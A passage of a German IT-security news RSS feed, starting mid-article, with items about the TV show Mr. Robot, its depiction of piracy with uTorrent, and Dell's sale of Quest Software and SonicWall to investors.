Mr. Robot is a USA Network TV show that revolves around the life of Elliot, a talented security engineer that has an alter ego as Mr. Robot, the leader of the FSociety hacking crew.

The show, which deals with a lot more than hacking, got to a spectacular start, winning a Golden Globe for Best Television Series - Drama, for its first season.

Mr. Robot TV show dealt with ransomware at the start of season 2

The show is now well embedded in the infosec community, which respects it so much for the accuracy it depicts hacks and technical details that it nominated Marc Rogers, the security expert consulting on the show, to a Pwnie Award for Epic Achievement at this year's Black Hat security conference.

In the season two]]></content:encoded>
</item>
<item>
<title><![CDATA[Mr. Robot 'Plugs' uTorrent and Pirate Release Groups]]></title>
<description><![CDATA[From a TorrentFreak report: The latest episode of award-winning TV show Mr. Robot includes a nod to online pirates. The main character Elliot is shown pirating a movie using uTorrent, while his movie folder lists movies from various pirate groups including YIFY. The group in question appreciates ...]]></description>
<link>https://tsecurity.de/de/57391/it-security/mr-robot-plugs-utorrent-and-pirate-release-groups/</link>
<guid isPermaLink="true">https://tsecurity.de/de/57391/it-security/mr-robot-plugs-utorrent-and-pirate-release-groups/</guid>
<pubDate>Sun, 31 Jul 2016 17:20:06 +0200</pubDate>
<category>📰 IT Security</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[From a TorrentFreak report: The latest episode of award-winning TV show Mr. Robot includes a nod to online pirates. The main character Elliot is shown pirating a movie using uTorrent, while his movie folder lists movies from various pirate groups including YIFY. The group in question appreciates the "bad ass" mention, while another group casts doubt on the hacker's choice of BitTorrent client. As the screenshot shows, Elliot uses a recent version of the popular BitTorrent client uTorrent, showing a house ad for an upgrade to uTorrent Plus. In the "movies" folder, which is also shown, we can see various other movies complete with release group tags such as YIFY, PRiSTiNE, DiPSHiT, RARBG and CRiTERiON.<p></p><div>
<a href="http://twitter.com/home?status=Mr.+Robot+'Plugs'+uTorrent+and+Pirate+Release+Groups%3A+http%3A%2F%2Fbit.ly%2F2aTLRj5"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F16%2F07%2F31%2F0120222%2Fmr-robot-plugs-utorrent-and-pirate-release-groups%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>

<a href="http://plus.google.com/share?url=https://yro.slashdot.org/story/16/07/31/0120222/mr-robot-plugs-utorrent-and-pirate-release-groups?utm_source=slashdot&amp;utm_medium=googleplus"><img src="http://www.gstatic.com/images/icons/gplus-16.png" alt="Share on Google+"></a>                                                                                                                                                                              



</div><p><a href="https://yro.slashdot.org/story/16/07/31/0120222/mr-robot-plugs-utorrent-and-pirate-release-groups?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mr. Robot 'Plugs' uTorrent and Pirate Release Groups]]></title>
<description><![CDATA[From a TorrentFreak report: The latest episode of award-winning TV show Mr. Robot includes a nod to online pirates. The main character Elliot is shown pirating a movie using uTorrent, while his movie folder lists movies from various pirate groups including YIFY. The group in question appreciates ...]]></description>
<link>https://tsecurity.de/de/57391/it-security/mr-robot-plugs-utorrent-and-pirate-release-groups/</link>
<guid isPermaLink="true">https://tsecurity.de/de/57391/it-security/mr-robot-plugs-utorrent-and-pirate-release-groups/</guid>
<pubDate>Sun, 31 Jul 2016 17:20:06 +0200</pubDate>
<category>📰 IT Security</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[From a TorrentFreak report: The latest episode of award-winning TV show Mr. Robot includes a nod to online pirates. The main character Elliot is shown pirating a movie using uTorrent, while his movie folder lists movies from various pirate groups including YIFY. The group in question appreciates the "bad ass" mention, while another group casts doubt on the hacker's choice of BitTorrent client. As the screenshot shows, Elliot uses a recent version of the popular BitTorrent client uTorrent, showing a house ad for an upgrade to uTorrent Plus. In the "movies" folder, which is also shown, we can see various other movies complete with release group tags such as YIFY, PRiSTiNE, DiPSHiT, RARBG and CRiTERiON.<p></p><div>
<a href="http://twitter.com/home?status=Mr.+Robot+'Plugs'+uTorrent+and+Pirate+Release+Groups%3A+http%3A%2F%2Fbit.ly%2F2aTLRj5"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F16%2F07%2F31%2F0120222%2Fmr-robot-plugs-utorrent-and-pirate-release-groups%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>

<a href="http://plus.google.com/share?url=https://yro.slashdot.org/story/16/07/31/0120222/mr-robot-plugs-utorrent-and-pirate-release-groups?utm_source=slashdot&amp;utm_medium=googleplus"><img src="http://www.gstatic.com/images/icons/gplus-16.png" alt="Share on Google+"></a>                                                                                                                                                                              



</div><p><a href="https://yro.slashdot.org/story/16/07/31/0120222/mr-robot-plugs-utorrent-and-pirate-release-groups?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Bestätigt: Dell verkauft Teile seiner Software-Sparte an Finanzinvestoren]]></title>
<description><![CDATA[Elliot Managmenet und San Francisco Partners übernehmen unter anderem den IT-Management-Spezialisten Quest Software sowie die Security-Tochter SonicWall. Zusammen haben sie mehr als 180.000 Kunden. Der Kaufpreis beträgt Reuters zufolge rund 2 Milliarden Dollar.]]></description>
<link>https://tsecurity.de/de/51058/it-nachrichten/bestaetigt-dell-verkauft-teile-seiner-software-sparte-an-finanzinvestoren/</link>
<guid isPermaLink="true">https://tsecurity.de/de/51058/it-nachrichten/bestaetigt-dell-verkauft-teile-seiner-software-sparte-an-finanzinvestoren/</guid>
<pubDate>Tue, 21 Jun 2016 11:21:45 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Elliot Managmenet und San Francisco Partners &uuml;bernehmen unter anderem den IT-Management-Spezialisten Quest Software sowie die Security-Tochter SonicWall. Zusammen haben sie mehr als 180.000 Kunden. Der Kaufpreis betr&auml;gt Reuters zufolge rund 2 Milliarden Dollar.]]></content:encoded>
</item>
<item>
<title><![CDATA[Bestätigt: Dell verkauft Teile seiner Software-Sparte an Finanzinvestoren]]></title>
<description><![CDATA[Elliot Managmenet und San Francisco Partners übernehmen unter anderem den IT-Management-Spezialisten Quest Software sowie die Security-Tochter SonicWall. Zusammen haben sie mehr als 180.000 Kunden. Der Kaufpreis beträgt Reuters zufolge rund 2 Milliarden Dollar.]]></description>
<link>https://tsecurity.de/de/51058/it-nachrichten/bestaetigt-dell-verkauft-teile-seiner-software-sparte-an-finanzinvestoren/</link>
<guid isPermaLink="true">https://tsecurity.de/de/51058/it-nachrichten/bestaetigt-dell-verkauft-teile-seiner-software-sparte-an-finanzinvestoren/</guid>
<pubDate>Tue, 21 Jun 2016 11:21:45 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Elliot Managmenet und San Francisco Partners &uuml;bernehmen unter anderem den IT-Management-Spezialisten Quest Software sowie die Security-Tochter SonicWall. Zusammen haben sie mehr als 180.000 Kunden. Der Kaufpreis betr&auml;gt Reuters zufolge rund 2 Milliarden Dollar.]]></content:encoded>
</item>
<item>
<title><![CDATA[Dell will angeblich Teile seines Software-Geschäfts veräußern]]></title>
<description><![CDATA[Aktuell verhandelt es laut Reuters mit den Investmentunternehmen Elliot Management und San Francisco Partners. Im Gespräch ist ein Kaufpreis von rund 2 Milliarden Dollar. Zum Verkauf sollen unter anderem der 2012 übernommene IT-Management-Spezialist Quest Software sowie die Security-Tochter Sonic...]]></description>
<link>https://tsecurity.de/de/50892/it-nachrichten/dell-will-angeblich-teile-seines-software-geschaefts-veraeussern/</link>
<guid isPermaLink="true">https://tsecurity.de/de/50892/it-nachrichten/dell-will-angeblich-teile-seines-software-geschaefts-veraeussern/</guid>
<pubDate>Mon, 20 Jun 2016 15:21:22 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Aktuell verhandelt es laut Reuters mit den Investmentunternehmen Elliot Management und San Francisco Partners. Im Gespr&auml;ch ist ein Kaufpreis von rund 2 Milliarden Dollar. Zum Verkauf sollen unter anderem der 2012 &uuml;bernommene IT-Management-Spezialist Quest Software sowie die Security-Tochter SonicWall stehen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Dell will angeblich Teile seines Software-Geschäfts veräußern]]></title>
<description><![CDATA[Aktuell verhandelt es laut Reuters mit den Investmentunternehmen Elliot Management und San Francisco Partners. Im Gespräch ist ein Kaufpreis von rund 2 Milliarden Dollar. Zum Verkauf sollen unter anderem der 2012 übernommene IT-Management-Spezialist Quest Software sowie die Security-Tochter Sonic...]]></description>
<link>https://tsecurity.de/de/50892/it-nachrichten/dell-will-angeblich-teile-seines-software-geschaefts-veraeussern/</link>
<guid isPermaLink="true">https://tsecurity.de/de/50892/it-nachrichten/dell-will-angeblich-teile-seines-software-geschaefts-veraeussern/</guid>
<pubDate>Mon, 20 Jun 2016 15:21:22 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Aktuell verhandelt es laut Reuters mit den Investmentunternehmen Elliot Management und San Francisco Partners. Im Gespr&auml;ch ist ein Kaufpreis von rund 2 Milliarden Dollar. Zum Verkauf sollen unter anderem der 2012 &uuml;bernommene IT-Management-Spezialist Quest Software sowie die Security-Tochter SonicWall stehen.]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,18ms -->